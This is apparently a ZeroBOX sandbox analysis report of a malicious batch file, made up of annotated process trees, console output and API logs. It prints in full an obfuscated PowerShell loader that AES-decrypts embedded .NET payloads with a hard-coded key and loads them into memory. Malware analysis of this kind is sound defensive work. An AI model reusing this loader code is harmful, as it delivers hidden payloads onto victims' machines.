Summary | ZeroBOX

Hceea_SC.bat

Analyst note: this is a two-stage loader. Stage 1 (cmd.exe, run via `start /wait` and then `cmd /K`) copies a file into %TEMP% as Hceea_SC.bat.exe ("1 file(s) copied." in the console output) and launches it with `-w hidden -c <script>`; the copied file is evidently a PowerShell host, since the console output that follows is PowerShell's parser error text. Stage 2 is the script shown in the process tree: every .NET member name is split with the junk token `MBJv` and reassembled with `.Replace('MBJv', '')`; decoded, the names are TransformFinalBlock, Load, ReadLines, ChangeExtension, CreateDecryptor, GetCurrentProcess, ElementAt, Split, EntryPoint, FromBase64String, MainModule and Invoke. The script reads line 2 of its own .bat (Process.MainModule.FileName with the `.exe` extension stripped), drops the first two characters, splits on ':' and, for each half, Base64-decodes, AES-CBC/PKCS7-decrypts with the key and IV hard-coded in the script (a 32-byte key, i.e. AES-256), GZip-decompresses, then Assembly.Load()s the result and invokes its EntryPoint — the second half is loaded first. Because the key and IV are in the clear, both embedded .NET payloads can be recovered statically from line 2 of the .bat without running it. In this run the script never executed: PowerShell aborted with a parse error (`Unexpected token '('` at char 990, marked `<<<<` at `[System.Convert]::$AotJ(`). The `<<<<` marker is PowerShell 2.0's error format (the Windows 7 default), and v2 appears not to accept a static member invoked through a variable name, which is exactly the construct at that position. Everything below therefore describes the loader shell only, not the decrypted payloads.

Downloader FTP Code injection DGA HTTP PWS ScreenShot Create Service KeyLogger P2P Internet API Sniff Audio DNS Escalate priviledges Http API Steal credential Socket AntiVM AntiDebug
(These tags are rolled up from the rule descriptions listed at the end of the report. Most of them — Downloader, FTP, DGA, HTTP, KeyLogger, ScreenShot, Sniff Audio, P2P — have no matching runtime evidence in this report: no hosts were contacted, no DNS or HTTP was seen, and the PowerShell stage aborted before the payloads ran, so they are best read as static string/capability hits on the scanned binary rather than observed behaviour.)
Category Machine Started Completed
FILE s1_win7_x6401 June 21, 2023, 7:48 a.m. June 21, 2023, 7:50 a.m.
Size 998.9KB
Type DOS batch file, ASCII text, with very long lines, with CRLF line terminators
MD5 b3ca3299d9eb527a687232c6ec7bd05e
SHA256 561cbe3e6bc18eac2a78545d5d6da27b559fb8040256fad41454ee30a6a7483b
CRC32 6A933183
ssdeep 12288:k+OmToydDoCViG60XQ9APT70WPKAL5VUtQRf/8YN5i+FgHYmwHfYPy00OrdMUJ0Z:kpQtRo9APT9ZpfN5WVEleyNQVe
Yara None matched

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "vfrjvoBTejgvVag" C:\Users\test22\AppData\Local\Temp\Hceea_SC.bat

    2568
    • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Hceea_SC.bat

      2644
      • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Hceea_SC.bat

        2756
        • Hceea_SC.bat.exe "C:\Users\test22\AppData\Local\Temp\Hceea_SC.bat.exe" -w hidden -c $pEMo='TraMBJvnsfMBJvorMBJvmFMBJvinaMBJvlBlMBJvoMBJvckMBJv'.Replace('MBJv', '');$iyaC='LMBJvoMBJvadMBJv'.Replace('MBJv', '');$tcQw='RMBJveadLMBJviMBJvneMBJvsMBJv'.Replace('MBJv', '');$KuMS='CMBJvhMBJvangMBJveEMBJvxMBJvtenMBJvsioMBJvnMBJv'.Replace('MBJv', '');$trmt='CreMBJvateDMBJvecMBJvrMBJvypMBJvtorMBJv'.Replace('MBJv', '');$fUaA='GeMBJvtMBJvCurMBJvrentMBJvProMBJvcMBJveMBJvssMBJv'.Replace('MBJv', '');$jFAl='EMBJvleMBJvmeMBJvntAMBJvtMBJv'.Replace('MBJv', '');$GMsR='SplMBJvitMBJv'.Replace('MBJv', '');$SgZi='EntMBJvrMBJvyMBJvPMBJvoMBJvinMBJvtMBJv'.Replace('MBJv', '');$AotJ='FrMBJvomBaMBJvsMBJve6MBJv4StMBJvriMBJvngMBJv'.Replace('MBJv', '');$NumX='MMBJvainMBJvModMBJvulMBJveMBJv'.Replace('MBJv', '');$SCtU='IMBJvnvMBJvokMBJveMBJv'.Replace('MBJv', '');function gYYuy($Ztzwf){$NuTmR=[System.Security.Cryptography.Aes]::Create();$NuTmR.Mode=[System.Security.Cryptography.CipherMode]::CBC;$NuTmR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$NuTmR.Key=[System.Convert]::$AotJ('9RE7z9qQbXo70lNlRZf0jPT2QRG4KCsVkZBJkUBk4l4=');$NuTmR.IV=[System.Convert]::$AotJ('A1++iPLzbLBcVKc2yItI3g==');$BvNdb=$NuTmR.$trmt();$wrDar=$BvNdb.$pEMo($Ztzwf,0,$Ztzwf.Length);$BvNdb.Dispose();$NuTmR.Dispose();$wrDar;}function pFMIH($Ztzwf){$XcMqn=New-Object System.IO.MemoryStream(,$Ztzwf);$ffVFP=New-Object System.IO.MemoryStream;$MiwFe=New-Object System.IO.Compression.GZipStream($XcMqn,[IO.Compression.CompressionMode]::Decompress);$MiwFe.CopyTo($ffVFP);$MiwFe.Dispose();$XcMqn.Dispose();$ffVFP.Dispose();$ffVFP.ToArray();}$uxbhR=[System.Linq.Enumerable]::$jFAl([System.IO.File]::$tcQw([System.IO.Path]::$KuMS([System.Diagnostics.Process]::$fUaA().$NumX.FileName, $null)), 1);$XmldQ=$uxbhR.Substring(2).$GMsR(':');$bUPcU=pFMIH (gYYuy ([Convert]::$AotJ($XmldQ[0])));$LzWhx=pFMIH (gYYuy 
([Convert]::$AotJ($XmldQ[1])));[System.Reflection.Assembly]::$iyaC([byte[]]$LzWhx).$SgZi.$SCtU($null,$null);[System.Reflection.Assembly]::$iyaC([byte[]]$bUPcU).$SgZi.$SCtU($null,$null);

          2852

Name Response Post-Analysis Lookup
No hosts contacted. (Expected here rather than reassuring: the PowerShell stage failed at parse time, so the embedded payloads — which carry whatever network behaviour the sample has — never executed in this run. Absence of network activity does not indicate the sample is benign.)
IP Address Status Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: 1 file(s) copied.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Unexpected token '(' in expression or statement.
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: At line:1 char:990
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: + $pEMo='TraMBJvnsfMBJvorMBJvmFMBJvinaMBJvlBlMBJvoMBJvckMBJv'.Replace('MBJv', '
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: ');$iyaC='LMBJvoMBJvadMBJv'.Replace('MBJv', '');$tcQw='RMBJveadLMBJviMBJvneMBJv
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: sMBJv'.Replace('MBJv', '');$KuMS='CMBJvhMBJvangMBJveEMBJvxMBJvtenMBJvsioMBJvnMB
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: Jv'.Replace('MBJv', '');$trmt='CreMBJvateDMBJvecMBJvrMBJvypMBJvtorMBJv'.Replace
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: ('MBJv', '');$fUaA='GeMBJvtMBJvCurMBJvrentMBJvProMBJvcMBJveMBJvssMBJv'.Replace(
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: 'MBJv', '');$jFAl='EMBJvleMBJvmeMBJvntAMBJvtMBJv'.Replace('MBJv', '');$GMsR='Sp
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: lMBJvitMBJv'.Replace('MBJv', '');$SgZi='EntMBJvrMBJvyMBJvPMBJvoMBJvinMBJvtMBJv'
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: .Replace('MBJv', '');$AotJ='FrMBJvomBaMBJvsMBJve6MBJv4StMBJvriMBJvngMBJv'.Repla
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: ce('MBJv', '');$NumX='MMBJvainMBJvModMBJvulMBJveMBJv'.Replace('MBJv', '');$SCtU
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: ='IMBJvnvMBJvokMBJveMBJv'.Replace('MBJv', '');function gYYuy($Ztzwf){$NuTmR=[Sy
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: stem.Security.Cryptography.Aes]::Create();$NuTmR.Mode=[System.Security.Cryptogr
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: aphy.CipherMode]::CBC;$NuTmR.Padding=[System.Security.Cryptography.PaddingMode]
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: ::PKCS7;$NuTmR.Key=[System.Convert]::$AotJ( <<<< '9RE7z9qQbXo70lNlRZf0jPT2QRG4K
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: CsVkZBJkUBk4l4=');$NuTmR.IV=[System.Convert]::$AotJ('A1++iPLzbLBcVKc2yItI3g==')
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: ;$BvNdb=$NuTmR.$trmt();$wrDar=$BvNdb.$pEMo($Ztzwf,0,$Ztzwf.Length);$BvNdb.Dispo
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: se();$NuTmR.Dispose();$wrDar;}function pFMIH($Ztzwf){$XcMqn=New-Object System.I
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: O.MemoryStream(,$Ztzwf);$ffVFP=New-Object System.IO.MemoryStream;$MiwFe=New-Obj
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: ect System.IO.Compression.GZipStream($XcMqn,[IO.Compression.CompressionMode]::D
console_handle: 0x00000107
1 1 0

WriteConsoleW

buffer: ecompress);$MiwFe.CopyTo($ffVFP);$MiwFe.Dispose();$XcMqn.Dispose();$ffVFP.Dispo
console_handle: 0x00000113
1 1 0

WriteConsoleW

buffer: se();$ffVFP.ToArray();}$uxbhR=[System.Linq.Enumerable]::$jFAl([System.IO.File]:
console_handle: 0x0000011f
1 1 0

WriteConsoleW

buffer: :$tcQw([System.IO.Path]::$KuMS([System.Diagnostics.Process]::$fUaA().$NumX.File
console_handle: 0x0000012b
1 1 0

WriteConsoleW

buffer: Name, $null)), 1);$XmldQ=$uxbhR.Substring(2).$GMsR(':');$bUPcU=pFMIH (gYYuy ([C
console_handle: 0x00000137
1 1 0

WriteConsoleW

buffer: onvert]::$AotJ($XmldQ[0])));$LzWhx=pFMIH (gYYuy ([Convert]::$AotJ($XmldQ[1])));
console_handle: 0x00000143
1 1 0

WriteConsoleW

buffer: [System.Reflection.Assembly]::$iyaC([byte[]]$LzWhx).$SgZi.$SCtU($null,$null);[S
console_handle: 0x0000014f
1 1 0

WriteConsoleW

buffer: ystem.Reflection.Assembly]::$iyaC([byte[]]$bUPcU).$SgZi.$SCtU($null,$null);
console_handle: 0x0000015b
1 1 0

WriteConsoleW

buffer: + CategoryInfo : ParserError: ((:String) [], ParentContainsErrorR
console_handle: 0x00000167
1 1 0

WriteConsoleW

buffer: ecordException
console_handle: 0x00000173
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : UnexpectedToken
console_handle: 0x0000017f
1 1 0
Time & API Arguments Status Return Repeated
(Note: blob_type 6 is PUBLICKEYBLOB, and every call below has a NULL export-key handle and an unreadable output buffer, which looks like public-key material being size-queried rather than a secret being exported. The script's own AES routine uses the managed Aes class and never ran, so these CryptExportKey calls are presumably from host start-up (e.g. signature or strong-name checks) — confirm against the process that issued them.)

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004106a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410c28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410c28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410c28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410628
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410628
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410628
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410628
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410628
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410628
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410ba8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410ba8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410ba8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410c28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410c28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410c28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410a68
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410c28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410c28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410c28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410c28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410c28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410c28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410c28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410ce8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410ce8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410ce8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410ce8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410ce8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410ce8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410ce8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410ce8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410ce8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410ce8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410ce8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410ce8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410ce8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410ce8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410268
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410268
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410268
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410268
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410268
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00410268
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated
(Note: the PAGE_EXECUTE_READWRITE allocations below are in PID 2852, the PowerShell host; a managed runtime JIT-compiles into RWX pages, so these are expected for any .NET process and — given the parse failure — are not evidence that the decrypted payloads ran. The `heap_dep_bypass: 1` flags are the sandbox's heuristic on those same allocations.)

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 2228224
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02800000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01eea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ee2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ef2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029e1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f1a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ef3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ef4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f6b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f67000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01eeb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f12000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f65000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ef5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f1c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02920000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ef6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f6c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f13000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f14000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f15000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f16000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f17000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f18000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f19000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029c1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029c3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029c4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029c5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029c6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029c7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029c8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
